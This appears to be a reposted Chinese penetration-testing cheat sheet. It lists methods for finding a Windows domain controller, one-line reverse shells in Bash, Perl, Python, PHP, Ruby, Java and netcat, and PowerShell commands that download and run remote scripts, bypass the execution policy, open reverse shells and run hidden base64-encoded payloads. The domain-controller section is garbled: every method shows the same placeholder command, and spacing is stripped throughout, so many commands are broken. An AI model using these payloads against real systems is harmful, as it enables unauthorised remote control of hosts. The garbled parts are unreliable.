一.查找域控的幾種常用方法

1.net view

netdomquerypdc

2.set log

netdomquerypdc

3.通過srv記錄

netdomquerypdc

4.使用nltest

netdomquerypdc

5.使用dsquery

netdomquerypdc

6.使用netdom

netdomquerypdc

注釋：這些都是win系統自帶的命令，有的時候win版本不同，有的命令會不存在，所以多一種方法，多一種成功的可能性，實際滲透，自行根據目標環境變換。

二.各種語言一句話反彈shell

Bash [不通用，跟linux發行版本有關，在ubuntu上測試成功]

bash-i>&/dev/tcp/10.0.0.1/80800>&1

PERL

perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'

Python

python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

php-r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh-i<&3>&32>&3");'

Ruby

ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'

JAVA

r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/2002;cat<&52=""|=""while=""read=""line;=""do=""$line="">&5>&5;done"]asString[])p.waitFor()

netcat

nc-e/bin/shx.x.x.x2333

但某些版本的nc沒有-e參數(非傳統版),則可使用以下方式解決rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncx.x.x.x2333>/tmp/f

三.常用Power shell命令

1.通過遠程下載來執行

Set-ExecutionPolicyRemoteSignedIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

2.把ps腳本傳到本地后執行

PowerShell.exe-epBypass-Filed:powercat.ps1

3.本地交互式執行

E:>PowerShell.exe-ExecutionPolicyBypassInvoke-PowerShellTcp-Reverse-IPAddress10.18.180.18-Port4444

4.把ps腳本編碼成base64來執行[實戰用的最多]

powershell-epbypass-NoLogo-NonInteractive-NoProfile-windowstyleHidden-encbase64加密過的命令

作者：Ms08067安全實驗室 轉載注明：https://www.secpulse.com/archives/120372.html